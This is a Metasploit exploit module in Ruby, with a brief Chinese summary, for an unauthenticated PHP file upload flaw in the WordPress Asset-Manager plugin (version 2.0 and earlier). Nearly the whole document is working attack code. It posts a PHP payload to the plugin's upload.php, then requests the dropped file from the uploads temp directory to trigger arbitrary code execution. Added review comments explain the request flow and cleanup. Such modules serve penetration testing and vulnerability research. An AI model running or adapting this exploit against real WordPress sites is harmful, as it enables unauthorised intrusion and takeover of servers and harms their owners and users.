这个模块利用 Metasploit 漏洞库中针对 WordPress Asset-Manager 插件 2.0 及以下版本的漏洞。该插件的 upload.php 允许上传 PHP 文件：用户无需身份验证即可向临时目录上传文件，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/php_exe'
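# Unauthenticated PHP file upload in the WordPress Asset-Manager plugin (<= 2.0).
#
# Flow: POST a multipart body containing a PHP payload to the plugin's
# upload.php (no credentials required), then GET the dropped file out of
# wp-content/uploads/assets/temp/ so the web server executes it.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata and the single user-facing option (TARGETURI).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this may not be the original advisory link; confirm
          # against the upstream module's references before relying on it.
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Upload the payload through upload.php, then request it to trigger execution.
  #
  # Raises (via fail_with) Exploit::Failure::UnexpectedReply when the upload
  # response is missing, non-200, or does not echo the uploaded filename, or
  # when the execution request returns an explicit non-200 status.
  def exploit
    uri = target_uri.path
    # Build a new string instead of appending to the returned path in place.
    uri = "#{uri}/" unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self asks the dropped PHP to remove itself once it runs. If the
    # execution request below never reaches it (e.g. upload succeeded but the
    # GET fails), the file presumably stays in the temp directory and must be
    # cleaned up manually - verify on the target after a failed run.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Plain substring check: interpolating the filename into a regex made the
    # '.' in '.php' a wildcard, so the match was looser than intended.
    unless res && res.code == 200 && res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is deliberately tolerated: a payload that takes over the
    # request may never send a reply. Only an explicit non-200 counts as failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end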